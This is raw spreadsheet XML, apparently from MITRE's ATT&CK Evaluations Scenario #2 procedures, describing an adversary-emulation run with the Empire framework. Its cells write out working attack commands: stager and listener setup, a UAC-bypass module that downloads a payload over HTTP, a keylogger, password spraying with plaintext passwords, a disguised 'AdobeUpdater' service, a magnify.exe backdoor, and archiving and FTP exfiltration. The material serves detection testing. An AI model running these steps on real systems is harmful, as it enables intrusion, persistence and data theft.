        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>tty_tickets</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).</t>
    </r>
  </si>
  <si>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</si>
  <si>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Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.</t>
  </si>
  <si>
    <r>
      <t>The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>trap</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>ctrl+c</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>ctrl+d</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>trap 'command list' signals</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> where "command list" will be executed when "signals" are received.</t>
    </r>
  </si>
  <si>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</si>
  <si>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r>
      <t>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>C$</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>ADMIN$</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>IPC$</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>winrm</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command or by any number of programs such as PowerShell.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are used to manage additional helper programs and functionalities that support Winlogon.</t>
    </r>
  </si>
  <si>
    <t>shell whoami /all /fo list</t>
  </si>
  <si>
    <t>shell net localgroup "Administrators"</t>
  </si>
  <si>
    <t>WinEnum: Get-UserInfo</t>
  </si>
  <si>
    <t>WinEnum: “AD Group Memberships”</t>
  </si>
  <si>
    <t>WinEnum: Get-SysInfo</t>
  </si>
  <si>
    <t>WinEnum: “Last 5 Files Opened”</t>
  </si>
  <si>
    <t>WinEnum: “Password Last Changed”</t>
  </si>
  <si>
    <t>WinEnum: “Interesting Files”</t>
  </si>
  <si>
    <t>WinEnum: “Clipboard Contents”</t>
  </si>
  <si>
    <t>WinEnum: “Services”</t>
  </si>
  <si>
    <t>WinEnum: “Available Shares”</t>
  </si>
  <si>
    <t>WinEnum: “Mapped Network Drives”</t>
  </si>
  <si>
    <t>WinEnum: “AV Solution</t>
  </si>
  <si>
    <t>WinEnum: “Firewall Rules”</t>
  </si>
  <si>
    <t>WinEnum: Get-NetInfo – “Network Adapters”</t>
  </si>
  <si>
    <t>WinEnum: Get-NetInfo – “Netstat Established Connections and Processes”</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate members of the Domain Administrators group.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate members of the local Administrators group.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate local system user accounts.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate domain user accounts</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate hosts within the domain.</t>
  </si>
  <si>
    <t>The netstat utility was executed via PowerShell to enumerate local active network connections.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate local active network connections.</t>
  </si>
  <si>
    <t>The reg utility was executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions.</t>
  </si>
  <si>
    <t>The Empire native UAC bypass attack was executed to steal the token of an existing high-integrity process, download a new payload over HTTP port 8080 and execute it, resulting in a RAT running in a high-integrity context.</t>
  </si>
  <si>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</si>
  <si>
    <t>The native Get-Content cmdlet was executed via PowerShell to copy a target file from a remote file share previously identified during the keylogging process as containing credentials.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to brute force password spraying authentication attempts to remote admin shares</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to remove the previous mapped remote admin share.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to successfully authenticate to and mount a remote admin share on the domain controller.</t>
  </si>
  <si>
    <t>Another Empire stager was dropped to disk on the initial victim</t>
  </si>
  <si>
    <t>The native move command was executed via PowerShell to copy the Empire stager to the domain controller.</t>
  </si>
  <si>
    <t>The sc utility was executed via PowerShell to enumerate active services on the domain controller.</t>
  </si>
  <si>
    <t>The sc utility was executed via PowerShell to create and attempt to disguise a new service on the domain controller.</t>
  </si>
  <si>
    <t>The sc utility was executed via PowerShell to enumerate the newly created service on the domain controller.</t>
  </si>
  <si>
    <t>The native type command was executed via PowerShell to enumerate the Empire stager previously copied to the domain controller</t>
  </si>
  <si>
    <t>The sc utility was executed via PowerShell to launch the newly created service on the domain controller, executing the Empire stager and creating a new, elevated RAT on the domain controller.</t>
  </si>
  <si>
    <t>The reg utility was executed via PowerShell to identify a specific Registry key associated with terminal services to ensure RDP was enabled.</t>
  </si>
  <si>
    <t>The takeown utility was executed via PowerShell to obtain ownership of the magnify utility binary.</t>
  </si>
  <si>
    <t>The icacls utility was executed via PowerShell to modify the discretionary access control list for the magnify utility binary.</t>
  </si>
  <si>
    <t>The native copy command was executed via PowerShell to overwrite the magnify utility binary with the cmd utility binary.</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>The native Get-ChildItem cmdlet was executed via PowerShell to enumerate files in a remote file share.</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>A renamed binary of the WinRAR utility was dropped to disk on the initially compromised host.</t>
  </si>
  <si>
    <t>The renamed WinRAR utility was used to create an encrypted archive of the previously staged target file.</t>
  </si>
  <si>
    <t>The ftp utility was executed to copy the previously created archive through a network connection separate of the C2 channel.</t>
  </si>
  <si>
    <t>The native del command was executed via PowerShell to delete the previously created files.</t>
  </si>
  <si>
    <t>The native del command was executed via PowerShell to delete the renamed WinRAR utility.</t>
  </si>
  <si>
    <t>The cmd binary that replaced the magnify binary was executed through the logon screen of an RDP connection made to the domain controller.</t>
  </si>
  <si>
    <t>The native whoami command was executed via the previously launched cmd to identify information about the current user context.</t>
  </si>
  <si>
    <t>The executed Empire payload established an encrypted C2 channel over HTTPS on TCP port 443</t>
  </si>
  <si>
    <t>The route utility was executed via PowerShell to enumerate the local routing table.</t>
  </si>
  <si>
    <t>The ipconfig utility was executed via PowerShell to enumerate local TCP/IP network configuration information.</t>
  </si>
  <si>
    <t>The whoami utility was executed via PowerShell to enumerate information about the current user context.</t>
  </si>
  <si>
    <t>The qprocess utility was executed via PowerShell to enumerate local running processes.</t>
  </si>
  <si>
    <t>The net utility was executed via PowerShell to enumerate local active services.</t>
  </si>
  <si>
    <t>shell net start</t>
  </si>
  <si>
    <t>shell net group "Domain Admins" /domain</t>
  </si>
  <si>
    <t>shell net user</t>
  </si>
  <si>
    <t>shell net group "Domain Computers" /domain</t>
  </si>
  <si>
    <t>shell net use</t>
  </si>
  <si>
    <t>usemodule powershell/privesc/bypassuac_tokenmanipulation</t>
  </si>
  <si>
    <t>shell route print</t>
  </si>
  <si>
    <t>shell ipconfig /all</t>
  </si>
  <si>
    <t>shell qprocess *</t>
  </si>
  <si>
    <t>shell net user /domain</t>
  </si>
  <si>
    <t>shell reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"</t>
  </si>
  <si>
    <t>shell c:\windows\system32\icacls.exe C:\windows\system32\magnigy.exe /grant SYSTEM:F</t>
  </si>
  <si>
    <t>shell copy C:\Windows\system32\cmd.exe C:\windows\system32\magnigy.exe</t>
  </si>
  <si>
    <t>shell get-childitem -Path \\initialcompromise\remoteshare -Recurse</t>
  </si>
  <si>
    <t>The native copy command was executed via PowerShell to copy and stage a target file from a remote file share on the initially compromised host. Empire 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)</t>
  </si>
  <si>
    <t>copy file to c:\$RecycleBin\</t>
  </si>
  <si>
    <t>upload recycler.exe</t>
  </si>
  <si>
    <t>shell c:\windows\system32\ftp.exe -v -s:ftp.txt</t>
  </si>
  <si>
    <t>shell c:\windows\recycler.exe a -hpfadfsdfsd c:\$Recycle.Bin\old c:\$Recycle.Bin\shockwave_network.vsdx</t>
  </si>
  <si>
    <t>del c:\$Recycle.Bin\old.rar</t>
  </si>
  <si>
    <t>del c:\windows\recycler.exe</t>
  </si>
  <si>
    <t>RDP Connection to DC and pressin f5</t>
  </si>
  <si>
    <t>whoami /all via magnify</t>
  </si>
  <si>
    <t>Empire Commands / Notes</t>
  </si>
  <si>
    <t>listeners
uselistener http
set Name https
set Host 10.0.10.106
set Port 443
set CertPath /opt/Empire/data
execute</t>
  </si>
  <si>
    <t>HR001</t>
  </si>
  <si>
    <t>ATT&amp;CK Eval Scenario #2 Procedures</t>
  </si>
  <si>
    <t>11.A.1</t>
  </si>
  <si>
    <t>11.B.1</t>
  </si>
  <si>
    <t>12.A.1</t>
  </si>
  <si>
    <t>12.A.2</t>
  </si>
  <si>
    <t>12.B.1</t>
  </si>
  <si>
    <t>12.C.1</t>
  </si>
  <si>
    <t>12.D.1</t>
  </si>
  <si>
    <t>Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques</t>
  </si>
  <si>
    <t>12.E.1</t>
  </si>
  <si>
    <t>12.E.1.1</t>
  </si>
  <si>
    <t>12.E.1.2</t>
  </si>
  <si>
    <t>12.E.1.3</t>
  </si>
  <si>
    <t>12.E.1.4.1</t>
  </si>
  <si>
    <t>12.E.1.4.2</t>
  </si>
  <si>
    <t>12.E.1.5</t>
  </si>
  <si>
    <t>12.E.1.6.1</t>
  </si>
  <si>
    <t>12.E.1.6.2</t>
  </si>
  <si>
    <t>12.E.1.7</t>
  </si>
  <si>
    <t>12.E.1.8</t>
  </si>
  <si>
    <t>12.E.1.9.1</t>
  </si>
  <si>
    <t>12.E.1.9.2</t>
  </si>
  <si>
    <t>12.E.1.10.1</t>
  </si>
  <si>
    <t>12.E.1.10.2</t>
  </si>
  <si>
    <t>12.E.1.11</t>
  </si>
  <si>
    <t>12.E.1.12</t>
  </si>
  <si>
    <t>12.F.1</t>
  </si>
  <si>
    <t>12.F.2</t>
  </si>
  <si>
    <t>12.G.1</t>
  </si>
  <si>
    <t>12.G.2</t>
  </si>
  <si>
    <t>13.A.1</t>
  </si>
  <si>
    <t>13.B.1</t>
  </si>
  <si>
    <t>ATT&amp;CK Eval Step</t>
  </si>
  <si>
    <t>13.B.2</t>
  </si>
  <si>
    <t>13.C.1</t>
  </si>
  <si>
    <t>14.A.1</t>
  </si>
  <si>
    <t>15.A.1</t>
  </si>
  <si>
    <t>FILESERVER</t>
  </si>
  <si>
    <t>15.B.1</t>
  </si>
  <si>
    <t>16.A.1</t>
  </si>
  <si>
    <t>ACCT001
IT001</t>
  </si>
  <si>
    <t>Source Endpoint</t>
  </si>
  <si>
    <t>Source Username</t>
  </si>
  <si>
    <t>nmartha</t>
  </si>
  <si>
    <t xml:space="preserve">The net utility was executed via PowerShell to successfully authenticate to and mount a remote admin share using credentials of a separate user exposed by the brute force. Empire: 'net use' via PowerShell to successfully authenticate to </t>
  </si>
  <si>
    <t>16.B.1</t>
  </si>
  <si>
    <t>pgustavo</t>
  </si>
  <si>
    <t>16.C.1</t>
  </si>
  <si>
    <t>16.D.1</t>
  </si>
  <si>
    <t>HFDC01</t>
  </si>
  <si>
    <t>Target Endpoint</t>
  </si>
  <si>
    <t>Target Username</t>
  </si>
  <si>
    <t>16.E.1</t>
  </si>
  <si>
    <t>16.F.1</t>
  </si>
  <si>
    <t xml:space="preserve">The Empire native runas module was executed to execute the Empire stager via cmd using the credentials previously exposed as useful by the brute force. Built-in runas module executed to launch malicious VBScript </t>
  </si>
  <si>
    <t>16.G.1</t>
  </si>
  <si>
    <t>16.H.1</t>
  </si>
  <si>
    <t>shell c:\windows\system32\sc.exe \\HFDC01 query</t>
  </si>
  <si>
    <t>16.I.1</t>
  </si>
  <si>
    <t>16.J.1</t>
  </si>
  <si>
    <t>Lateral Movement
Execution</t>
  </si>
  <si>
    <t>Lateral Movement
Discovery</t>
  </si>
  <si>
    <t>Lateral Movement
Privilege Escalation
Persistence</t>
  </si>
  <si>
    <t>16.K.1</t>
  </si>
  <si>
    <t>16.L.1</t>
  </si>
  <si>
    <t>Persistence
Discovery</t>
  </si>
  <si>
    <t>Persistence
Defense Evasion</t>
  </si>
  <si>
    <t>Collection
Discovery</t>
  </si>
  <si>
    <t>Persistence
Execution</t>
  </si>
  <si>
    <t>17.A.1</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>17.B.1</t>
  </si>
  <si>
    <t>17.B.2</t>
  </si>
  <si>
    <t>shell takeown.exe /F C:\Windows\system32\magnify.exe</t>
  </si>
  <si>
    <t>17.C.1</t>
  </si>
  <si>
    <t>18.A.1</t>
  </si>
  <si>
    <t>FILESERVER
HR001</t>
  </si>
  <si>
    <t>18.B.1</t>
  </si>
  <si>
    <t>19.A.</t>
  </si>
  <si>
    <t>19.B.1</t>
  </si>
  <si>
    <t>19.C.1</t>
  </si>
  <si>
    <t>19.D.1</t>
  </si>
  <si>
    <t>19.D.2</t>
  </si>
  <si>
    <t>20.A.1</t>
  </si>
  <si>
    <t>20.B.1</t>
  </si>
  <si>
    <t>Defense Evasion
Execution</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>usemodule situational_awareness/host/winenum</t>
  </si>
  <si>
    <t>Phase</t>
  </si>
  <si>
    <t>Initial Compromise</t>
  </si>
  <si>
    <t>Inintial compromise was emulated via a malicious VBScript. A legitimate user executed a VBScript stager, which launched PowerShell to download and execute an Empire payload</t>
  </si>
  <si>
    <t>Initial Discovery</t>
  </si>
  <si>
    <t>Discovery for Lateral Movement</t>
  </si>
  <si>
    <t>shell netstat -ano</t>
  </si>
  <si>
    <t>usestager windows/launcher_vbs
set Listener https
set OutFile /tmp/autoupdate.vbs
execute
user nmartha double clicks vbs script</t>
  </si>
  <si>
    <t>shell reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA</t>
  </si>
  <si>
    <t>WinEnum: “Windows Last Updated” "Get-Hotfix"</t>
  </si>
  <si>
    <t>WinEnum: "System Information"</t>
  </si>
  <si>
    <t>listeners
usestager multi/launcher
set Listener https
set OutFile /tmp/update.ps1
execute
usemodule pusemodule privesc/bypassuac_tokenmanipulation
set Host http://10.0.10.106
set Port 8888
set Stager update.ps1
execute</t>
  </si>
  <si>
    <t>Privilege Escalation
Defense Evasion</t>
  </si>
  <si>
    <t>Command And Control
Lateral Movement</t>
  </si>
  <si>
    <t>Command And Control</t>
  </si>
  <si>
    <t>Collection
Credential Access</t>
  </si>
  <si>
    <t>HFDC1</t>
  </si>
  <si>
    <t>usemodule usemodule collection/keylogger
execute
jobs
jobs kill {job id number}</t>
  </si>
  <si>
    <t>scriptimport /root/share_spraying.ps1
scriptcmd spray</t>
  </si>
  <si>
    <t>Lateral Movemet</t>
  </si>
  <si>
    <t>shell net use `\`\HFDC01\C$ password /user:shire\pgustavo</t>
  </si>
  <si>
    <t>shell net use /delete `\`\HFDC01\ADMIN$</t>
  </si>
  <si>
    <t>shell net use `\`\HFDC01\ADMIN$ /user:shire\pgustavo W1n1!20</t>
  </si>
  <si>
    <t xml:space="preserve">shell net use `\`\HFDC01\ADMIN$ /user:shire\pgustavo W1n1!19 </t>
  </si>
  <si>
    <t>get-content \\HFDC1\IT\it_tasks.txt</t>
  </si>
  <si>
    <t>shell c:\windows\system32\sc.exe `\`\HFDC01 start AdobeUpdater</t>
  </si>
  <si>
    <t>shell c:\windows\system32\sc.exe `\`\HFDC01 qc AdobeUpdater</t>
  </si>
  <si>
    <t>shell type "c:\users\usrname\AppData\Roaming\Adobe\Flash Player\update.ps1"</t>
  </si>
  <si>
    <t>shell C:\WINDOWS\system32\sc.exe `\`\HFDC01 create AdobeUpdater binPath= "cmd.exe /c `\`"powershell -command C:\Users\pgustavo\AppData\Roaming\Adobe\Flash Player\update.ps1`\`" " DisplayName= "Adobe Flash Updater" start= auto</t>
  </si>
  <si>
    <t>shell move-item c:\tools\autoupdate.vbs "\\HFDC01\C$\Users\pgustavo\AppData\Roaming\Adobe\Flash Player\update.ps1"</t>
  </si>
  <si>
    <t>scriptimport /root/invoke-runas-cmd.ps1
scriptcmd Invoke-RunAs -username pgustavo -password "W!n1!19" -domain shire -Cmd cmd.exe -Arguments "/c powershell -command c:\tools\update.ps1"</t>
  </si>
  <si>
    <t>upload /tmp/update.ps1
shell copy .\update.ps1 c:\tools\update.ps1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</si>
</sst>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0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Courier"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>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rgb="FFB2DFC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BFC8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFECDDE5"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB1CAC6"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAC8E0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDEEEF7"/>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1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignmen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10" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0"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6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11"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0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyFill="1" applyBorder="1"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7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="10" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="10" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="1" xfId="0" applyFill="1"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0" fillId="13" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="13" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5"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DEEEF7"/>
      <color rgb="FFFFDD5E"/>
      <color rgb="FFDAC8E0"/>
      <color rgb="FFB1CAC6"/>
      <color rgb="FFECDDE5"/>
      <color rgb="FFEC9B78"/>
      <color rgb="FFFFBFC8"/>
      <color rgb="FFB2DFCF"/>
      <color rgb="FFBCEBDA"/>
      <color rgb="FFCE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089" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1138" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1043" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1164" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1101" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1107" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1159" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1080" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1128" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1220" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1122" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1051" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1015" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1061" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1171" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1184" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1096" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 